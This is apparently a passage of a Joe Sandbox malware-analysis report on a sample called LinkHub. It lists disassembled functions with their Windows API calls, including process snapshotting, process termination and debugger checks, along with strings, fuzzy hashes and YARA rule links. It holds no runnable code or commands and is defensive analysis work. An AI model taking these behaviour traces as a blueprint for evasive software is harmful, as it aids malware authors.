Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: e2e9012d5d8083d3e293991e619111d121c809bfff66218c1d6b9916d6cd171b
Instruction ID: 026e76e34f83ec6594443bcd8d859dfd16734b029a0c3abaa157e465041cf561
Opcode Fuzzy Hash: e2e9012d5d8083d3e293991e619111d121c809bfff66218c1d6b9916d6cd171b
Instruction Fuzzy Hash: 18115A75610618FFDB318F64CC80BFE77F8EF41760B104499E842E7210E271AE419761

Function 00BBF6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00C048C6

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 47d4192a43800b1d8d859d97d6e438705d994ae73b55bdc17217ebcd62350c65
Instruction ID: de3c13ee5a5f888641fc8379da249d26ee592308362f362812ed5da08bf59075
Opcode Fuzzy Hash: 47d4192a43800b1d8d859d97d6e438705d994ae73b55bdc17217ebcd62350c65
Instruction Fuzzy Hash: 91C24A71A00616DFCB24DF98C880BBEB7F1FB09710F2481A9E955AB391D7B5AD41CB90

Function 00BD014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00BD09D8

Part of subcall function 00BD3614: RaiseException.KERNEL32(?,?,?,00BD09FA,74DE2E40,?,?,?,?,?,?,?,00BD09FA,?,00C79758), ref: 00BD3674

__CxxThrowException@8.LIBVCRUNTIME ref: 00BD09F5

Strings

Unknown exception, xrefs: 00BD0A02

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 6dcc59cad9b5c2a694e62ce1e9582901072b61ded6707313f3555cc5317bf46c
Instruction ID: f7e48eef9fff1251ac993f6b0209bab0fe948452d093e7f87bdfdb2e1a45f1b3
Opcode Fuzzy Hash: 6dcc59cad9b5c2a694e62ce1e9582901072b61ded6707313f3555cc5317bf46c
Instruction Fuzzy Hash: D7F0A43491020D768B04BAA8DC56A9EF7FC9A00750F6041B3B928A6796FB74E655C690

Function 00C389B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C38D52
TerminateProcess.KERNEL32(00000000), ref: 00C38D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00C38F3A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 36e1c56bd6b01dbe7ac064c4653b723496ede02fe404fd7bf0fe460cdea86914
Instruction ID: ae41e8090ea63330339aaaf453891344cf0a321318f982e060da7c7d591906e5
Opcode Fuzzy Hash: 36e1c56bd6b01dbe7ac064c4653b723496ede02fe404fd7bf0fe460cdea86914
Instruction Fuzzy Hash: 37127971A183019FC714DF28C484B6ABBE5FF88314F14895DF8998B292CB75E949CB92

Function 00C39AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C39B87
_strcat.LIBCMT ref: 00C39BC6
_wcslen.LIBCMT ref: 00C39C14

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: 4f68651fcc8572278c28e65ed45b24781e90e75c12c5224d1a04f2343e3e7c81
Instruction ID: b9a3e7aee9b80c64f8616d10592de228c3aa37b500b0823820d34c2d2237dfd7
Opcode Fuzzy Hash: 4f68651fcc8572278c28e65ed45b24781e90e75c12c5224d1a04f2343e3e7c81
Instruction Fuzzy Hash: C0A13731604605EFCB18DF18D5D29A9BBE1FF45314B6084AEE85A8F792DB71ED42CB80

Function 00BB2793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BB32AF
Part of subcall function 00BB327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BB32B7
Part of subcall function 00BB327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BB32C2
Part of subcall function 00BB327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BB32CD
Part of subcall function 00BB327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BB32D5
Part of subcall function 00BB327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BB32DD

Part of subcall function 00BB3205: RegisterWindowMessageW.USER32(00000004,?,00BB2964), ref: 00BB325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BB2A0A
OleInitialize.OLE32 ref: 00BB2A28
CloseHandle.KERNELBASE(00000000,00000000), ref: 00BF3A0D

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 2cb743f7a636a07af484bb055d441dc2d657f7dc9219bfb03784cc3d10fdf868
Instruction ID: 83707c4e8c6c59d24a1b32a9a809ca4d546f082bfa5a745334be1a32291c64fd
Opcode Fuzzy Hash: 2cb743f7a636a07af484bb055d441dc2d657f7dc9219bfb03784cc3d10fdf868
Instruction Fuzzy Hash: B6717DB19912009FCB88EF69ED6DB6D7BE4FB98305340456EE40AD72A2EBB04441DF5C

Function 00BE8A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,00BE894C,?,00C79CE8,0000000C), ref: 00BE8A84
GetLastError.KERNEL32(?,00BE894C,?,00C79CE8,0000000C), ref: 00BE8A8E
__dosmaperr.LIBCMT ref: 00BE8AB9

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: dc695280d68d55aa0134ce8023ee4684d03799a9b483a5589b6a1a33215e08d8
Instruction ID: d1a553b612b5118423cc537185b8756e73f1e2b976bf211ade36ecbe5ad4a2f9
Opcode Fuzzy Hash: dc695280d68d55aa0134ce8023ee4684d03799a9b483a5589b6a1a33215e08d8
Instruction Fuzzy Hash: C9012B327059E05AC6346376AC8577E67C9CB82738F2912EAF91D9B1D2DF318D818690

Function 00BE970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00BE97BA,FF8BC369,00000000,00000002,00000000), ref: 00BE9744
GetLastError.KERNEL32(?,00BE97BA,FF8BC369,00000000,00000002,00000000,?,00BE5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00BD6F41), ref: 00BE974E
__dosmaperr.LIBCMT ref: 00BE9755

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 2de232b15c6775e461114daf6c404f3c8012147118c2f140306845c6f08828a3
Instruction ID: e9494081fe2526c8de4745431ed479df099d8412d9a748aa9e4ea16b0e552412
Opcode Fuzzy Hash: 2de232b15c6775e461114daf6c404f3c8012147118c2f140306845c6f08828a3
Instruction Fuzzy Hash: 64019C32720155ABCB119F9ADC05D6E7BA9EB81330B240289FC118B290EB30DD45CB90

Function 00C20D18 Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,00C20B03,00000000,?,00000000,?,00BF3A00,00000000), ref: 00C20D2E
GetCurrentProcess.KERNEL32(?,00000000,?,00C20B03,00000000,?,00000000,?,00BF3A00,00000000), ref: 00C20D36
DuplicateHandle.KERNELBASE(00000000,?,00C20B03,00000000,?,00000000,?,00BF3A00,00000000), ref: 00C20D3D

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CurrentProcess$DuplicateHandle
String ID:
API String ID: 1294930198-0
Opcode ID: 6956560b5ee81e5ceed4b6bd9254a2fe359290d04a0f1e63965dc1337c7b6f14
Instruction ID: 3935349649d678415b9c17cf4c5b23038fb96ac61c84d5248240d5ff26f68c0d
Opcode Fuzzy Hash: 6956560b5ee81e5ceed4b6bd9254a2fe359290d04a0f1e63965dc1337c7b6f14
Instruction Fuzzy Hash: 71D0177A150305BBC7022BD5FC19F3E7BBCEB86B32F20401AF60A865619AB099009621

Function 00BC2B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00BC3006

Strings

CALL, xrefs: 00BC2FD6

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 6ef04590cb91caef54c1c854c971792da81ae571564db47ff636ca1206252a30
Instruction ID: 6b28e75942605ef95beed03e4071a7fe0609b0c3cba4bb626913478e82fe11e1
Opcode Fuzzy Hash: 6ef04590cb91caef54c1c854c971792da81ae571564db47ff636ca1206252a30
Instruction Fuzzy Hash: 3B2257706082429FD714DF24C884F2ABBE1FF98714F14899DF49A9B3A1D772E941CB52

Function 00BB3A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00BF413B

Part of subcall function 00BB5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB55D1,?,?,00BF4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BB5871

Part of subcall function 00BB3A57: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BB3A76

Strings

X, xrefs: 00BF4109

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: c8b6cb469c221f92fe0e7a08d6682b86b7094bac78c7bb538b2dad0e46638ecd
Instruction ID: 8697b6667e306afb29fe3673442e4b5e24ed24183e18a6594797e5e32a0102e1
Opcode Fuzzy Hash: c8b6cb469c221f92fe0e7a08d6682b86b7094bac78c7bb538b2dad0e46638ecd
Instruction Fuzzy Hash: 6621A170A0025C9BCB119F94C845BFE7BFCAF49700F108099E545A7241DFF89A8D8F61

Function 00BCFFE0 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00BD007D
CreateToolhelp32Snapshot.KERNEL32 ref: 00BD008F

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CloseCreateHandleSnapshotToolhelp32
String ID:
API String ID: 3280610774-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: d09f85a38921e1937c53a37645c2a4a97303290306c5da1904abaed05a834248
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 2A31C470A10109EBC718EE58D490B69F7E6FB49300F2486E6E409CB352E672EDC1CBC0

Function 00BB396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BB3A3C

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 050eabbbac88ddd12b66ccb4de766fad123ef80d21a41697567a69985e4fad2b
Instruction ID: 77aa043d2b3149bd3bfd0a28380a1ddbe9bcf458f3dc11a5853ec02ed907fdf3
Opcode Fuzzy Hash: 050eabbbac88ddd12b66ccb4de766fad123ef80d21a41697567a69985e4fad2b
Instruction Fuzzy Hash: 8831A2706047019FD320DF34D894BEBBBE8FB49718F00096EE6DA87251E7B5A948CB56

Function 00BE4EB8 Relevance: 3.1, APIs: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00BE4F04
GetFileType.KERNELBASE(00000000), ref: 00BE4F16

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: a7d3a551e44a0d666cfcc156eb0284925a5d8108f28a269a0adf35acf8895991
Instruction ID: dd2b2092e8d0a92800b5d99ff40399344a6af3d7899fddb97957defbb834cd28
Opcode Fuzzy Hash: a7d3a551e44a0d666cfcc156eb0284925a5d8108f28a269a0adf35acf8895991
Instruction Fuzzy Hash: 5811A2315087818AC7348A3F9C886266AD5EB96730B38079AD5BBC75F2C720D88292C4

Function 00C20AC4 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,00BF3A00,00000000), ref: 00C20AEC
InterlockedExchange.KERNEL32(00000038,00000000), ref: 00C20B0E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
String ID:
API String ID: 4104817828-0
Opcode ID: 1806559f6ff9bfeb4f914f5ad8ca390260d27572c444838439eafa6c59f61bb2
Instruction ID: b290efc70ad6c20c7c3e16d86718ae0829e5140ecd04db7b3ea3c29afd5feffe
Opcode Fuzzy Hash: 1806559f6ff9bfeb4f914f5ad8ca390260d27572c444838439eafa6c59f61bb2
Instruction Fuzzy Hash: 0FF03AB15017059FC320DF5AD9449ABFBFCFF95720B40482EE48687A21C7B4B445CB90

Function 00BB331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00BB333D

Part of subcall function 00BB32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00BB32FB
Part of subcall function 00BB32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BB3312

Part of subcall function 00BB338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00BB3368,?), ref: 00BB33BB
Part of subcall function 00BB338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00BB3368,?), ref: 00BB33CE
Part of subcall function 00BB338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C82418,00C82400,?,?,?,?,?,?,00BB3368,?), ref: 00BB343A
Part of subcall function 00BB338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00C82418,?,?,?,?,?,?,?,00BB3368,?), ref: 00BB34BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00BB3377

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 8b8dd384099c54843187f891bc5f45d718854f08e1fd46b30310b593a3303692
Instruction ID: cfc99861e6b12d1f7972e6a2ddca8882368861e1a40982e9e0bcab303d434c50
Opcode Fuzzy Hash: 8b8dd384099c54843187f891bc5f45d718854f08e1fd46b30310b593a3303692
Instruction Fuzzy Hash: AFF0BE31548340AFD3006F60EE1EB7D37E8A700B09F00085ABA09861F2DBFA91518B08

Function 00C20B4C Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Part of subcall function 00C21312: InterlockedExchange.KERNEL32(?,?), ref: 00C21322
Part of subcall function 00C21312: EnterCriticalSection.KERNEL32(00000000,?), ref: 00C21334
Part of subcall function 00C21312: TerminateThread.KERNEL32(00000000,000001F6), ref: 00C21342
Part of subcall function 00C21312: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C21350
Part of subcall function 00C21312: CloseHandle.KERNEL32(00000000), ref: 00C2135F
Part of subcall function 00C21312: InterlockedExchange.KERNEL32(?,000001F6), ref: 00C2136F
Part of subcall function 00C21312: LeaveCriticalSection.KERNEL32(00000000), ref: 00C21376

CloseHandle.KERNELBASE(?,?,00C20BBF), ref: 00C20B5D
DeleteCriticalSection.KERNEL32(?,?,00C20BBF), ref: 00C20B83

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 2929296749-0
Opcode ID: 1a61ff87ab6fbfc8763c84e400e02d14939bb7682ca2d0c71699c64e4f511f25
Instruction ID: 3d85735732bf07f47c3f95d9dc9afff3c89fce8f94b9eb52ec9528cbc78cab7c
Opcode Fuzzy Hash: 1a61ff87ab6fbfc8763c84e400e02d14939bb7682ca2d0c71699c64e4f511f25
Instruction Fuzzy Hash: A3E01A72014611ABCB347F64E849B46FBF4BF14322F34886EF09A55A31DB70A8849B04

Function 00BBCAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00BBCEEE

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Init_thread_footer
String ID:
